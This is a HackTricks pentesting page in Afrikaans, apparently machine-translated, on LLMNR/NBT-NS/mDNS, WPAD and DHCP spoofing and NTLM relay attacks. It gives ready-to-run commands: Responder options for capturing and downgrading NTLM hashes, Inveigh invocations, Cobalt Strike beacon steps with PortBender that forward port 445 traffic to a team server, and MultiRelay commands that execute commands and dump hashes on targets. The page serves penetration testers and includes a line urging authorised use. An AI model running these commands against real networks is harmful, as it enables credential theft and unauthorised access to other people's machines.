HackTricksSpoofing LLMNR, NBT-NS, mDNS/DNS en WPAD en Relay-aanvalle
Reading time: 6 minutes
tip
Leer & oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
Netwerkprotokolle
Plaaslike Gasheer Oplossingsprotokolle
- LLMNR, NBT-NS, en mDNS:
- Microsoft en ander bedryfstelsels gebruik LLMNR en NBT-NS vir plaaslike naamoplossing wanneer DNS misluk. Net so gebruik Apple en Linux stelsels mDNS.
- Hierdie protokolle is vatbaar vir onderskep en spoofing weens hul nie-geverifieerde, uitsendingsnatuur oor UDP.
- Responder kan gebruik word om dienste na te boots deur vervalste antwoorde na gashere wat hierdie protokolle vra, te stuur.
- Verdere inligting oor diensnaamsimulasie met behulp van Responder kan hier gevind word.
Web Proxy Auto-Discovery Protokol (WPAD)
- WPAD laat blaaiers toe om proxy-instellings outomaties te ontdek.
- Ontdekking word gefasiliteer via DHCP, DNS, of terugval na LLMNR en NBT-NS indien DNS misluk.
- Responder kan WPAD-aanvalle outomatiseer, wat kliënte na kwaadwillige WPAD-bedieners lei.
Responder vir Protokol Vergiftiging
- Responder is 'n hulpmiddel wat gebruik word om LLMNR, NBT-NS, en mDNS vrae te vergiftig, selektief te antwoord op grond van vraetipes, met die primêre fokus op SMB-dienste.
- Dit kom vooraf geïnstalleer in Kali Linux, konfigureerbaar by
/etc/responder/Responder.conf. - Responder vertoon gevangen hashes op die skerm en stoor dit in die
/usr/share/responder/logsgids. - Dit ondersteun beide IPv4 en IPv6.
- Windows weergawe van Responder is beskikbaar hier.
Responder Uitvoer
- Om Responder met standaardinstellings te laat loop:
responder -I <Interface> - Vir meer aggressiewe ondersoek (met moontlike newe-effekte):
responder -I <Interface> -P -r -v - Tegnieke om NTLMv1 uitdagings/antwoorde te vang vir makliker krak:
responder -I <Interface> --lm --disable-ess - WPAD-naamsimulasie kan geaktiveer word met:
responder -I <Interface> --wpad - NetBIOS versoeke kan opgelos word na die aanvaller se IP, en 'n verifikasie-proxy kan opgestel word:
responder.py -I <interface> -Pv
DHCP Vergiftiging met Responder
- Spoofing DHCP-antwoorde kan 'n slagoffer se routeringsinligting permanent vergiftig, wat 'n meer stil alternatief bied vir ARP vergiftiging.
- Dit vereis presiese kennis van die teiken netwerk se konfigurasie.
- Om die aanval te laat loop:
./Responder.py -I eth0 -Pdv - Hierdie metode kan effektief NTLMv1/2 hashes vang, maar dit vereis versigtige hantering om netwerkonderbreking te vermy.
Capturing Kredensiale met Responder
- Responder sal dienste na boots met behulp van die bogenoemde protokolle, en kredensiale (gewoonlik NTLMv2 Uitdaging/Antwoord) vang wanneer 'n gebruiker probeer om teen die gespoofde dienste te verifieer.
- Pogings kan aangewend word om af te gradeer na NetNTLMv1 of ESS te deaktiveer vir makliker kredensiaal krak.
Dit is van kardinale belang om te noem dat die gebruik van hierdie tegnieke wettig en eties gedoen moet word, met behoorlike magtiging en om onderbreking of ongeoorloofde toegang te vermy.
Inveigh
Inveigh is 'n hulpmiddel vir penetrasietoetsers en rooi spanlede, ontwerp vir Windows stelsels. Dit bied funksies soortgelyk aan Responder, wat spoofing en man-in-the-middle-aanvalle uitvoer. Die hulpmiddel het ontwikkel van 'n PowerShell-skrip na 'n C# binaire, met Inveigh en InveighZero as die hoof weergawes. Gedetailleerde parameters en instruksies kan in die wiki gevind word.
Inveigh kan deur PowerShell bedryf word:
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
Of uitgevoer as 'n C# binêre:
Inveigh.exe
NTLM Relay Aanval
Hierdie aanval benut SMB-authentikasiesessies om toegang tot 'n teikenmasjien te verkry, wat 'n stelselshell bied indien suksesvol. Sleutelvoorvereistes sluit in:
- Die autentiserende gebruiker moet Lokale Admin-toegang op die oorgedraagde gasheer hê.
- SMB-handtekening moet gedeaktiveer wees.
445 Poort Voorwaartse en Tunneling
In scenario's waar direkte netwerkintroduksie nie haalbaar is nie, moet verkeer op poort 445 vorentoe gestuur en getunnel word. Gereedskap soos PortBender help om poort 445-verkeer na 'n ander poort te herlei, wat noodsaaklik is wanneer lokale admin-toegang beskikbaar is vir bestuurderlaai.
PortBender opstelling en werking in Cobalt Strike:
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)
beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080
# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop
Ander Gereedskap vir NTLM Relay Aanval
- Metasploit: Opgestel met proxies, plaaslike en afstands gasheer besonderhede.
- smbrelayx: 'n Python-skrip vir die oordrag van SMB-sessies en die uitvoer van opdragte of die ontplooiing van agterdeure.
- MultiRelay: 'n Gereedskap uit die Responder-suite om spesifieke gebruikers of alle gebruikers te relaye, opdragte uit te voer, of hashes te dump.
Elke gereedskap kan gekonfigureer word om deur 'n SOCKS-proxy te werk, indien nodig, wat aanvalle moontlik maak selfs met indirekte netwerktoegang.
MultiRelay Operasie
MultiRelay word uitgevoer vanaf die /usr/share/responder/tools gids, met die fokus op spesifieke IP's of gebruikers.
python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
# Proxychains for routing traffic
Hierdie gereedskap en tegnieke vorm 'n omvattende stel vir die uitvoering van NTLM Relay-aanvalle in verskeie netwerkomgewings.
Force NTLM Logins
In Windows kan jy dalk sommige bevoorregte rekeninge dwing om te autentiseer op arbitrêre masjiene. Lees die volgende bladsy om te leer hoe:
Force NTLM Privileged Authentication
Verwysings
- https://intrinium.com/smb-relay-attack-tutorial/
- https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/
- https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
- https://intrinium.com/smb-relay-attack-tutorial/
- https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
tip
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.